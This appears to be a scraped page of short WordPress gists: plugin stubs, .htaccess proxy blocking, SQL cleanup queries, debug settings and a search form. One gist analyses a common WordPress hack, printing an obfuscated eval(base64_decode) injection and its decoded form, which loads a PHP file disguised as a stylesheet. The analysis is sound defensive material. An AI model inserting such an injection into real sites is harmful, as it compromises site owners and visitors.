This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
Plugin Name: Index.php fix | |
Plugin URI: http://ilikewordpress.com/loading-wordpress-from-index-php | |
Description: This plugin allows a blog installed at root to be addressed by /index.php. Remedies stripping of filename by includes/canonical.php | |
Author: Steve Johnson | |
Version: 1.0 | |
Author URI: http://ilikewordpress.com/ | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/ruby | |
require 'net/imap' | |
server = 'imap.mail.com' | |
username = 'YOUR USERNAME' | |
password = 'YOUR PASSWORD' | |
folder = 'INBOX' | |
imap = Net::IMAP.new(server, 993, true) | |
imap.login(user, password) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RewriteEngine on | |
RewriteCond %{HTTP:VIA} !^$ [OR] | |
RewriteCond %{HTTP:FORWARDED} !^$ [OR] | |
RewriteCond %{HTTP:USERAGENT_VIA} !^$ [OR] | |
RewriteCond %{HTTP:X_FORWARDED_FOR} !^$ [OR] | |
RewriteCond %{HTTP:PROXY_CONNECTION} !^$ [OR] | |
RewriteCond %{HTTP:XPROXY_CONNECTION} !^$ [OR] | |
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR] | |
RewriteCond %{HTTP:HTTP_CLIENT_IP} !^$ | |
RewriteRule ^(.*)$ - [F] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
WP Bag of Tricks | |
1. Helpful Scripts/Plugins: | |
Hacks: | |
http://wordpress.org/extend/plugins/tac/ | |
http://wordpress.org/extend/plugins/exploit-scanner/ (Can be extremely resource intensive.) | |
http://wordpress.org/extend/plugins/wp-malwatch/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DELETE FROM 'wp_options' WHERE 'option_name' LIKE CONVERT( _utf8 '_transient_feed%' USING latin1 ) COLLATE latin1_swedish_ci; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
Plugin Name: Gravatar Hovercards | |
Plugin URI: http://ottopress.com/2010/gravatar-hovercards/ | |
Description: Hover over a Gravatar to get more info. Neat-o! | |
Version: 0.1 | |
Author: Otto | |
*/ | |
function gravatar_hovercards_jquery() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I've been seeing this code crop up a lot in recent WordPress hacks: | |
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3VzZXIvZG9tYWluLmNvbS93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9za2lucy93cF90aGVtZS9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> | |
The issue normally involves "wp-login.php" returning a blank page for users trying to get into "wp-admin". | |
Running that bit of nastiness thru a base64 decoder gets us this: | |
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/user/domain.com/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Clean debugging: | |
// Add this to wp-config.php to cleanly debug a site. | |
// Just make sure to turn it off when you're done! | |
define('WP_DEBUG', true); // Turn debugging ON | |
define('WP_DEBUG_DISPLAY', false); // Turn forced display OFF | |
define('WP_DEBUG_LOG', true); // Turn logging to wp-content/debug.log ON | |
# Drop this in a .htaccess file in wp-content to keep the log safe. | |
<files debug.log> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
update wp_posts set post_content = replace(post_content,'’','\''); | |
update wp_posts set post_title = replace(post_title,'’','\''); | |
update wp_comments set comment_content = replace(comment_content,'’','\''); | |
update wp_postmeta set meta_value = replace(meta_value,'’','\''); | |
update wp_posts set post_excerpt = replace(post_excerpt,'’','\''); | |
update wp_posts set post_content = replace(post_content,'…','...'); | |
update wp_posts set post_title = replace(post_title,'…','...'); | |
update wp_comments set comment_content = replace(comment_content,'…','...'); | |
update wp_postmeta set meta_value = replace(meta_value,'…','...'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<form method="get" action="http://duckduckgo.com/" | |
onsubmit="document.getElementById('ddgsearchinput').value+=' site:example.com'"> | |
<input type="search" id="ddgsearchinput" name="q" size="24"/> | |
</form> |
OlderNewer